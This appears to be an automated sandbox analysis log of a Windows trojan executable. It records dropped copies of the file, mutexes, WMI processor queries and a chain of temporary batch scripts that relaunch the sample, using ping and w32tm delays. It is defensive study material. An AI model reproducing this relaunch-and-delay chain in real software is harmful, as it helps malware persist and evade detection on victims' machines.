                            Source: classification engineClassification label: mal100.troj.evad.winEXE@83/166@0/1
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\hhWvCZxk.logJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMutant created: \Sessions\1\BaseNamedObjects\Local\285180168aeb70ed1fd4bb736d89ef8294b44ac1e87ce1ee0993e5a09156e65b
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\AppData\Local\Temp\ki5mgHFA5BJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat"
                            Source: KPFv8ATDx0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: KPFv8ATDx0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: KPFv8ATDx0.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile read: C:\Users\user\Desktop\KPFv8ATDx0.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\KPFv8ATDx0.exe "C:\Users\user\Desktop\KPFv8ATDx0.exe"
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
